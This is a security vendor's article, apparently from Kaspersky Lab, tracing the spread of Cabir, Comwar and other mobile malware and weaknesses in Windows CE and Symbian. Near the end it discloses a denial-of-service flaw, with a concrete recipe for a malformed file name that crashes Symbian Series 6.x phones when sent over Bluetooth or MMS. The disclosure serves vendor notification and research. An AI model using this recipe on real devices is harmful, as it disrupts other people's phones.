Mobile Malware Evolution: An Overview, Part 2

1. Mobile Malware Evolution: An Overview, Part 1
2. Mobile Malware Evolution: An Overview, Part 2

Epidemics

Let’s take a look at how widespread mobile malware really is in the modern world. Users and journalists often complain that antivirus companies artificially inflate the danger of viruses, spreading hysteria. It’s said that Cabir’s chances of spreading are very low due to the fact that in order for the virus to be launched, the user has to confirm the action three times (in order to accept the file, launch the file, and install the worm). And Comwar couldn’t spread widely, because MMS isn’t in common use (the figure quoted is approximately 2% of mobile users overall). As for the danger of being infected by a vandal Trojan, for instance Skuller, most people don’t even want to hear about this; after all, in order for such a virus to infect your handset, you would have to download it from the Internet, copy it to the telephone, and then launch it.

Certainly from a theoretical point of view, these conclusions are logical, and reasonably convincing. However, the world of computer and mobile malware, just like those who use computers and mobile devices, constantly defies the laws of logic. The likelihood of a user receiving and launching Cabir is equal to the likelihood of a user accepting and launching a file sent via email from an unknown sender. And yes, the file will be launched. The global worm epidemics of the past few years – Mydoom, NetSky, Sober – are evidence of this. Antivirus companies never tire of repeating ‘Don’t launch a file sent to you by mail without scanning it first’. But this doesn’t seem to have had much effect – human curiosity, and a disregard for basic security always win out.

Cabir

Cabir was sent to antivirus companies in June 2004. Only a month later it became clear that cases of infection by Cabir had already been detected in the Philippines. This was surprising. At the time, we considered that Cabir was a ‘zoo’ virus which would never be found beyond the confines of the collections of antivirus companies. However, it turned out that it wasn’t only antivirus companies which had received Cabir, but virus writers as well. The virus broke free, and set off on its travels around the world.

We’ve been working with the Finnish company F-Secure for a long time. F-Secure was one of the first to draw attention to the problems of mobile malware, and the company has been conducting a considerable amount of research in this area. It started compiling a list of countries where Cabir had been detected. In less than a year, by summer 2005, this list included more than 20 countries. We were also collecting similar statistics, and this list contains some data from us as well. In addition to this, we’ve received confirmation of cases of infection from a number of countries which are already in the list. The list can therefore be seen as reflecting reality, and as a reliable source of information.

Approximately a year ago we started to lose count, and stopped updating the list. It was clear that there were already more than two dozen countries involved. Interestingly, the countries which suffered from Cabir were not necessarily those with the highest level of computer use.

Below are a few concrete cases of infections by Cabir. Russia is 9th in the list of countries affected. The fact that Cabir was in the wild in Russia first became clear in January 2005. By then, we already had received information that Cabir was attacking telephones in the Moscow metro. We’d also received similar information from neighbouring Ukraine, with Cabir surfacing in Kiev and Kharkiv. However, we weren’t able to confirm those cases, as no-one had contacted us with an infected telephone.

In January 2005 this changed – an employee working in the same building where Kaspersky Lab was located contacted our technical support, saying that a few days ago her handset had started to behave oddly, and this had been after she had accepted a file transmitted via Bluetooth in the metro. After taking a look at her phone, our virus analysts were able to confirm that it was infected with Cabir.a

We continued to encounter infected telephones throughout 2005; we also had reports from approximately 10 Kaspersky Lab employees that they had been asked whether or not they wanted to accept a file named caribe.sis, transmitted via Bluetooth. The most recent case that we recorded took place in February 2006.

Probably the best known local epidemic caused by Cabir took place in Helsinki in August 2005, during the 10th World Athletics championship. F-Secure’s head office is located in Helsinki, and it was F-Secure that started receiving reports of Cabir infection within the stadium where the World Championships were being held. Given the conditions, with tens of thousands of people from all over the world in a relatively small space, a single infected telephone could spread infection very quickly. While sporting records were being set on the field, Cabir was breaking records in terms of speed of propagation.

Thankfully, F-Secure personnel were able to act quickly, and established a point of contact in the Customer Service Center, where anyone who suspected that their mobile had been infected was able to have their handset checked and disinfected. If the epidemic hadn’t been localized, the infected handsets would been taken back to their respective countries of origin, and the number of countries affected by Cabir could have been considerably longer.

This is a clear example of what conditions are necessary for a Bluetooth worm to propagate successfully:

• a large number of people
• a limited amount of space

Restaurants, cinemas, airports, railway stations, undergrounds systems and sports grounds all fall into the category described above.

Bluetooth worms have the following peculiarities in terms of propagation:

• the infection radius is limited to the radius of the Bluetooth connection (approximately 10 – 20 meters)
• Bluetooth worms are unable to conduct targeted attacks, for instance in accordance with a list of potential victims or on a randomly generated phone number. Infection is spontaneous – if a vulnerable device is within range, then the worm will attempt to infect that device.

Comwar

The second worm for mobile devices detected in the wild was Comwar. In contrast to Cabir, which was initially sent to antivirus companies, and then was only later found in the wild, Comwar was detected after users in several countries had had their devices infected, and had sent suspicious files to antivirus companies for analysis. We were introduced to Comwar in March 2005; however, information was posted on some mobile phone message boards (for instance, in Holland and Serbia) about incidents in January 2005. This means we can state with certainty that Comwar was spreading around the world for at least two months before antivirus companies knew about it. This highlights the fact that the link between users and antivirus companies is still weak in terms of mobile malware – while PC users may suspect a virus at the least sign of anything unexpected happening on their computers, and contact an antivirus company, this is still far from the case in terms of mobile malware, and it will be a long time before this situation changes.

Just as with Cabir, F-Secure started keeping a list of countries where Comwar had been detected. We compared our data and the most recent list (September 2005) reads as follows:

It’s interesting that both lists are of a similar length (23 countries for Cabir, 22 for Comwar.) Comwar appeared 8 months after Cabir. However, it has a more dangerous propagation method (via MMS messages, which can be transmitted over any distance) which made it possible for it to catch up with Cabir. It seems highly likely that the number of countries with Comwar infections is now greater than the number of countries with Cabir infections.

There is one important point which should be stressed: the list includes countries where it was known that there had been at least one incident involving Comwar. This list should not be used to draw conclusions on how widespread the worm is within each individual country – preliminary estimates can only be made on the basis of other related evidence.

Thankfully, it’s not only antivirus companies which are concerned about worms which spread via MMS; mobile service providers are also doing their bit. In Russia, some providers have taken steps to protect their users by installing our antivirus solution (very similar to that used to scan email) on their networks.

This means we now have access to hard data, and as it turns out, MMS traffic doesn’t only contain mobile malware, but also traditional computer worms. This is because they send themselves to email addresses which may also be MMS addresses. However, as this article focuses on mobile malware, we won’t examine this topic here.

The data below is being published for the first time. The data comes from an analysis of the MMS traffic of one of the major Russian mobile service providers. The number of MMS messages analyzed has not been included at the request of the provider.

It’s worth highlighting the statistics for Comwar.d. This variant was created in a Spanish speaking country, which is why it’s all the more surprising to see it in Russian MMS traffic. Additionally, Comwar.d was first detected in March 2006, and arrived in Russia only four months later.

I’d also like to mention a case of infection by Comwar which was detected by KL employees. In June 2005, Kaspersky Lab held its partner conference in Greece. Once the conference was over, some KL employees took a yachting holiday on the Aegean. One day, the captain and owner of the yacht complained that his Nokia smartphone was constantly receiving messages that MMS messages hadn’t been delivered – this was strange, as he hadn’t sent any MMS messages. The beta version of KAV Mobile was downloaded from the Internet, installed, and the root of the problem found: the phone was infected with Comwar. It’s a strange thought that the worm can spread from a yacht in the middle of the ocean, as long as there’s mobile network coverage.

In addition to Cabir and Comwar, we class some variants of the Skuller, Drever, Appdisabler, Cardtrap, PbStealer, RedBrowser, Doombot, Flexispy Trojans and StealWar, a worm, as being in the wild. Many of these programs were presented as games or useful applications and published on sites aimed at Symbian users.

The birthplace of viruses

Inevitably, when the talk turns to computer viruses, the question about which country viruses come from will be raised. The Western media espouses the stereotype of the Russian threat. However, this is a myth which crumbles when examined carefully. Many virus writers whose creations caused epidemics in the past few years have been arrested; with others, it’s easy to establish which country they live in:

• Sasser and NetSky worms (Germany)
• Zafi worm (Hungary)
• Bozori worm (Turkey/ Morocco)
• Agobot and Codbot backdoors (the Netherlands)
• Slammer worm (East Asia)
• Sober worm (Germany)

The ‘Russians’ can only claim Bagle, and even this worm is likely to have been created by an international group of cyber criminals.

Going on what we’ve seen, at the moment China is leading this rather depressing race, with Brazil in second place. A significant number of modern viruses are created in Turkey, and countries of the former Soviet Union is level with Turkey in terms of number of viruses created.

Looking at mobile viruses from the same standpoint, the picture is similar. We can establish the country of origin in the vast majority of cases for the 31 families of mobile malware. As we already mentioned, Cabir was created by Vallez, a Frenchman. After the worm became available on the computer underground, modifications started to spring up all over the place. South East Asian countries (the Philippines, Indonesia, Malaysia and China) were the most active in creating new variants. However, when Velasco, a Brazilian, created Lasco, he also created several new Cabir variants.

The former Soviet Union also gained a place in the history of mobile malware by creating four viruses. Three of them were proof of concept. Brador, the first backdoor for WinCE was created by a programmer from Ukraine, who goes under the pseudonym BrokenSword. Comwar, which we’ve devoted a lot of space to in this article, was undoubtedly created in Russia – this is clear both from the texts within the worm itself, as is information we have about the creator who goes under the name of e10d0r. The author of the third PoC virus, a Trojan called RedBrowser, is unknown, but the texts within the Trojan and the phone number to which RedBrowser sends SMS messages clearly indicate the author’s Russian origins.

As for the Locknut Trojan, it was first detected by SimWorks, a New Zealand antivirus company. The conclusion that its creator is Russian was made on the basis of the ungrammatical texts within the Trojan and the file names used.

As we noted in the first part of this article, a number of Comwar variants contained texts in Spanish. This is the basis for concluding that it was created in Spain, but we don’t have any data about Comwar in Spain, which would be an indirect indicator of the virus’ origins.

Turkey was responsible for some modifications of Skuller and Cardtrap, and Arifat, a family of Trojans that we have currently seen only one sample of.

Without doubt, however, the vast majority of mobile viruses were created in China, and, possibly, South Korea. We came to this rather peculiar conclusion as we are dealing with a very peculiar situation. The problem is that over the past year, the vast majority of Trojans for mobile devices were initially detected and sent to antivirus companies from South Korea. However, an investigation into a number of cases showed that the Trojans were placed on Korean servers which had been hacked, and the hacking had been done from Chinese territory. Viruses such as PbStealer, StealWar and some variants of almost every similar Trojan family were also created in China.

One virus writer in Malaysia is also worthy of mention: s/he is responsible for the vast majority of Skuller variants, including, perhaps, the first one.

What do all these facts show? That the world of mobile malware is evolving in accordance with the same laws as the world of computer viruses. And that both mobile malware and computer viruses are created in the same countries.

The problem of operating systems

The factor which has most influence on the evolution of mobile malware is vulnerabilities in software and mobile device operating systems themselves. In the computing world, nearly all the major virus epidemics over the past few years have been caused by vulnerabilities in Windows. There are only two possible ways for remote malicious users to penetrate a potential victim system: by exploiting the human factor (social engineering) or by exploiting software coding errors (vulnerabilities). These attack vectors also apply to mobile devices.

Let’s take a look at three main vulnerability sources:

• Windows CE (operating system)
• Symbian (operating system)
• Wireless protocols (Bluetooth, WiFi, infra-red ports)

Windows CE is extremely vulnerable from the point of view of system security. There are no restrictions on executable applications and their processes. Once launched, a program can gain full access to any operating system function such as receiving and transmitting files, phone and multimedia functions etc. Creating applications for Windows CE is extremely easy, as the system is totally open to programming, making it possible to use not only machine languages (e.g. ASM for ARM) but also powerful development technologies such as .NET.

Although we currently know of only four virus families targeting Windows CE, the potential of this operating system as an environment for malicious code shouldn’t be underestimated. The viruses currently in existence represent all the most dangerous types of malicious program: classic file viruses, email worms, backdoors, and worms which are capable of moving from a handset to a desktop PC once connected to it. Platforms based on Windows CE are growing in popularity, and in a few years they may come to take the market share of mobile device operating systems, squeezing out Symbian.

Both virus writers and security researchers have become increasingly interested in Windows CE. We’ve already mentioned that Collin Mulliner gave a presentation at DefCon in August this year about a vulnerability in MMS processing in Windows CE 4.2x. Microsoft and its partners are currently working on fixing this error. Even once a fix is issued, though, users of vulnerable devices will have to be informed about the necessity of re-installing firmware on their smartphones/ PDAs.

We also shouldn’t forget that this is just one of the serious vulnerabilities detected in Windows CE over the past few months. It would be possible to organize a DoS attack on mobile devices via vulnerabilities in Active Sync and MMS/ SMS. The potential vulnerabilities in Internet Explorer for Windows CE and programs for changing file formats pose another threat. There’s no doubt that these vulnerabilities exist. The question is only who will detect them first – a virus writer, or a white hat security researcher such as Collin Mulliner or Tim Hurman (who detected the Bluetooth stack remote code execution vulnerability, information about which remains confidential to this day).

Duts, the first virus for Windows CE, exploited a vulnerability in the file API which was unknown to Microsoft (a so-called 0-day vulnerability).

To summarize: Windows CE is becoming more and more popular every day. The increase in the number of malicious programs for this platform may soon become equal to the increase in malware for Symbian. The main environment used to develop malicious programs will be .NET, and a significant number of these viruses will exploit vulnerabilities in Windows CE.

Currently, the most popular embedded OS is Symbian. In this case, the vulnerabilities are not such a danger as those in Windows CE, but this security is an illusion. The very architecture of Symbian Series 60 contains a range of serious errors, which we see as being real vulnerabilties. We’ve already mentioned that Symbian allows any system application to be rewritten without explicit user consent; additionally, problems can be caused by non-standard file formats, leading to the system becoming extremely unstable and the handset rebooting itself. The level of application security is very similar to that of Windows CE – in other words, it doesn’t exist. Once an application is in the system, it has total control over all functions. Thankfully, there’s not yet been a vulnerability in the parsing of Bluetooth connections and MMS for this platform. We can easily imagine what would have happened if Cabir or Comwar had been able to penetrate the system and launch itself automatically.

Symbian is a more closed system than Windows CE. A special range of development tools which costs tens of thousands of dollars is needed in order to create fully functional applications for Symbian. However, the number of Trojan programs for Symbian shows that vulnerabilities in the operating systems architecture make it possible to virus writers simply to use tools which are available to anyone.

It’s a paradoxical situation: Symbian is more popular than Windows CE, but there are fewer known serious vulnerabilities for this operating system. We think there can only be one explanation – researchers, at the moment, aren’t as focussed on Symbian as they are on Microsoft products. However, even a cursory glance and a few simple experiments reveal that Symbian is riddled with errors. As an example, here’s a description of one which could be seen as still being unknown. We received information about it from one of our users, checked it, and reproduced it in our test lab.

Phones running under Symbian Series 6.x are vulnerable. Testing was conducted on Siemens SX-1 and Nokia 3650.

In order to exploit this vulnerability, you simply need to create a file called “INFO.wmlc”, with 67 spaces between the INFO and the dot. The contents of the file can be anything larger than 2 bytes. If this file is sent to another device via Bluetooth or the infrared port (this file could also be sent as an MMS, or placed on a web site and opened when the site was visited, but this was not tested) then the recipient, on opening the message, will see an error message which reads “App. closed AppArcServerThread USER 8”. The phone will then start to work much more slowly, and some applications may cease to function after the phone is rebooted.

This is a classic denial of service vulnerability. The ‘wmlc’ vulnerability is associated with a standard browser, and when processing a non-standard file name, an error happens in the component responsible for launching the browser. We have not conducted a detailed analysis of the vulnerability, but it’s possible that it also makes it possible to execute arbitrary code.

The information above is official notification to Symbian of the existence of the vulnerability.

Symbian, the manufacturers of smartphones which use the OS and developers have already taken notice of the viruses for this operating system and are taking all steps possible to ensure that the next version of Symbian has maximum protection against any type of malicious code. Recently, it was announced that they are implementing an architecture for protected application, similar to TrustingComputer technology which is implemented in some PC processors. It’s also planned to create a ‘protected memory area’, to which only trusted applications will have access. In principle, this approach may solve the problem of primitive vandal programs such as Skuller, but it will not solve the issue of vulnerabilities in the operating system and its applications. Additionally, we should forget one of the laws of viruses: “A virus can do everything that a user can do within a system”. And that means that worms which send themselves via Bluetooth and MMS will remain a reality, at least for the foreseeable future.

This article doesn’t address the issue of vulnerabilities in Bluetooth and WiFi in any detail. Anyone interested in such issues can get information from groups such as Trifinite and Pentest. We have also previously published information in this area. The only thing we’ll mention here is that although there are a number of vulnerabilities in the wireless protocols for mobile devices, virus writers have not yet started to exploit them. However, we have no doubt that they will be exploited in the very near future.